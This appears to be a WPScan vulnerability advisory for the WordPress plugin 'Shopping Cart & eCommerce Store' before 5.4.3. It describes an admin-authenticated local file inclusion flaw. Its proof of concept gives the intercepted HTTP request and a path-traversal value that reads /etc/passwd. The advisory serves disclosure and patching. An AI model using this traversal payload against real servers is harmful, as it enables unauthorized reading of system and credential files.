wpvulndb | Shreya Pohekar | WPVDB-ID: 229B93CD-544B-4877-8D9F-E6DEBDA9511C
History: Mar 13, 2023 - 12:00 a.m.

Shopping Cart & eCommerce Store < 5.4.3 - Admin+ LFI

2023-03-13 00:00:00
Shreya Pohekar
wpscan.com
Tags: ecommerce store, lfi, admin, vulnerability, http requests, authenticated users, plugin, security

EPSS: 0.001 (Low), percentile 36.7%

The plugin does not validate the import_file_url parameter of the product-import HTTP request, allowing authenticated users with admin privileges to perform LFI attacks and read local files from the server.

PoC

1. Login as Admin.
2. Go to wp-admin/admin.php?page=wp-easycart-products&subpage=products
3. Click on Import Products. Browse any file and click on import file. Intercept the request. It will contain the following:

    POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
    Cookie: wordpress_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1675522971%; PHPSESSID=qp0lnu3uc71tv3hl6jcgsknnjd; wpeasycart_admin_perpage=25

    action=ec_admin_ajax_import_products&import_file_url=http%3A%2F%2F127.0.0.1%2Fwp-content%2Fuploads%2F2023%2F02%2Fresume_xss.png&wp_easycart_nonce=fd850a701e

4. Change the value of import_file_url to a file (ex: /../../../../../etc/passwd)
5. Send the request and you will see that the contents of /etc/passwd are obtained.

Note: only the first line is obtained in the response.

CPE
  Name:     wp-easycart
  Operator: lt
  Version:  5.4.3
